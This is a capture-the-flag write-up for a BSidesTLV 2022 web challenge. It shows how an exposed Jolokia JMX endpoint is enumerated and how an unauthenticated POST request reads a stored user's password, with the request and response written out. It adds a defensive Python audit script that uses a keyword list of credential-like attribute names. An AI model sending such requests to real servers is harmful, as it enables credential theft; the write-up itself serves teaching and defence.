Tags: web 

Running dirb on the provided list reveals that Jolokia JMX is publicly exposed. After reading up on how Jolokia works: going to https://not-found.ctf.bsidestlv.com/jolokia/list reveals that all MBeans are available for use. Searching the listing shows that users are stored in memory in this MBean: Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"

There is a user with username=BSidesTLV2022 and a role: k1aNoYouCantBruteIt} which looks like part of the flag. OK, another part is missing. Let's try to read the user's password with a POST request that reads from this MBean:

POST
https://not-found.ctf.bsidestlv.com/jolokia/
{
    "type": "read",
    "mbean": "Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"",
    "operation": "findUser",
    "arguments": ["BSidesTLV2022"],
    "attribute": "password"
}

The response reveals the second missing part:

{"timestamp":1656402372,"status":200,"request":{"mbean":"Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"","attribute":"password","type":"read"},"value":"{J0l0k1aJ0l0k1aJ0l0"}
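
An added example, not part of the original writeup: a defender-side check that parses a saved /jolokia/list response and flags MBean attributes with credential-like names, such as the password attribute read above. The sample listing and the list of name fragments are constructed assumptions; the JSON layout (value, then domain, then MBean, then attr) follows Jolokia's list response.

```python
import json

# Name fragments treated as credential-like (assumption; tune per environment).
SENSITIVE = ("password", "passwd", "secret", "token", "credential")

def audit_jolokia_list(list_response):
    """Return sorted (mbean, attribute, writable) for credential-like attributes."""
    if list_response.get("status") != 200:
        raise ValueError("not a successful Jolokia list response")
    findings = []
    for domain, mbeans in list_response.get("value", {}).items():
        for props, info in mbeans.items():
            # MBeans whose metadata could not be read carry no "attr" map.
            for attr, meta in (info.get("attr") or {}).items():
                if any(frag in attr.lower() for frag in SENSITIVE):
                    findings.append((f"{domain}:{props}", attr, bool(meta.get("rw"))))
    return sorted(findings)

# Constructed sample, trimmed to two MBeans; not output captured from the challenge.
SAMPLE = json.loads(r'''
{"status": 200, "value": {
  "java.lang": {"type=Memory": {"attr": {
      "Verbose": {"rw": true, "type": "boolean", "desc": ""}}}},
  "Users": {"database=UserDatabase,type=User,username=\"BSidesTLV2022\"": {"attr": {
      "username": {"rw": true, "type": "java.lang.String", "desc": ""},
      "password": {"rw": true, "type": "java.lang.String", "desc": ""},
      "roles": {"rw": false, "type": "[Ljava.lang.String;", "desc": ""}}}}
}}
''')

if __name__ == "__main__":
    for mbean, attr, writable in audit_jolokia_list(SAMPLE):
        print(f"{mbean} exposes '{attr}' (writable={writable})")
```

Name matching only catches the obvious cases: on this page the role attribute also held part of the secret, so the durable fix is to restrict or authenticate the Jolokia endpoint rather than rely on attribute names.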